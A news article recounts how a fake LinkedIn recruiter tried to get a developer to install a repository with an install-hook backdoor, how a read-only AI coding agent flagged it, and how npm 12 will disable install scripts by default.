"Don't run this code, just walk away because there's a trap," Roman Imankulov said his local AI agent told him when it analyzed a cloned repository.
How the bait was laid: fake recruiter, cloned repo, and a hidden backdoor
A person posing as a recruiter for a small crypto startup contacted Python developer Roman Imankulov on LinkedIn asking him to troubleshoot proof-of-concept code and consider a lead-engineer role. Imankulov said something about the exchange felt off; he cloned the repository to a Hetzner VPS and began an inspection. The repository contained a file, app/test/index.js, that embedded a backdoor: a server URL assembled from fragmented strings and a network request that would execute whatever the server returned.
The repo's package.json also included a "prepare" post-installation hook that would run the malicious script during an npm install. The repo itself has been removed — "presumably GitHub removed it in response to Imankulov's complaint" — though a clone can still be found, according to the reporting. When Imankulov contacted the apparent author of the commits, that developer told him he had been impersonated on GitHub before and did not write the code.
AI plus caution: a read-only analysis that spotted what a human missed
Rather than running the code locally, Imankulov ran a Pi coding agent powered by Codex to conduct a read-only analysis. He expected a safe-but-sloppy verdict; instead the agent flagged the file and advised him not to run the code. Imankulov said the agent "caught details that I had missed" — he had skimmed the file and assumed it was merely poorly written, while the agent identified the outbound request and assembled URL that constituted the backdoor.
The episode is not unique: the story cites other developers who nearly fell for similar social-engineering campaigns and were prevented from executing malicious code by AI agents. Devashri Datta, an independent open source and security architect, framed the pattern this way: attackers were "hijack[ing] standard developer workflows" by relying on routine commands such as npm install to trigger payloads, and obfuscating domains by fragmenting strings to defeat static analysis tools.
npm 12: a platform-level change to curb install-time execution
GitHub — which maintains npm — is preparing npm 12, and the release will change npm install's default behavior. According to GitHub, the allowScripts setting will be defaulted to off so that "npm install will no longer execute preinstall, install, or postinstall scripts from dependencies unless they are explicitly allowed in your project." GitHub product manager Leo Balter wrote that "install-time lifecycle scripts are the single largest code-execution surface in the npm ecosystem" and that making script execution opt-in "closes that path while keeping it one command away for the packages you trust."
Imankulov said he has little strong opinion about the change; for personal safety he switched to pnpm to avoid executing install scripts by default. Datta noted that the incident underlines why supply-chain security must reach developer endpoints: machines used during a job interview often store SSH keys, cloud tokens, and live repository access, making a compromised workstation an attractive first step for attackers.
What this means for developers, enterprises, and platforms
- Developers and security teams: The episode illustrates the value of constrained, read-only analysis and isolated execution environments. Datta recommended enforcing guardrails such as isolated developer containers or secure cloud workstations for evaluating third-party or untrusted code, while Imankulov's use of a VPS and an AI agent provided a quick, noninteractive triage.
- Enterprises and procurement leaders: Supply-chain security must "shift left" to the developer workstation. Datta argued that VEX-style signals and exploitability context need to travel further left than SBOM inventories to intercept threats at the point of introduction; a compromised local endpoint can expose keys and live access before code enters corporate pipelines.
- Platforms and social networks: LinkedIn's account-restriction data underscores the scale of the problem: the site restricted 386,000 accounts after user reports in January through June 2025, up from 266,000 in the prior six-month period and 86,000 in January through June 2021. The article connects that volume of fake or impersonated profiles to the social-engineering vectors used to lure developers into running code.
Conclusions: an incremental fix, and more to be done
Imankulov escaped what could have been a straightforward compromise by combining guarded operational choices with an AI inspection that spotted an obfuscated backdoor in seconds. GitHub's forthcoming npm 12 — with allowScripts defaulted off — addresses the installation-time execution vector at scale, but the incident illustrates that platform-level hardening, developer hygiene, and endpoint isolation all play roles. Datta's closing point is direct: attackers are moving their operations left, into individual engineering endpoints, and defenses must follow.
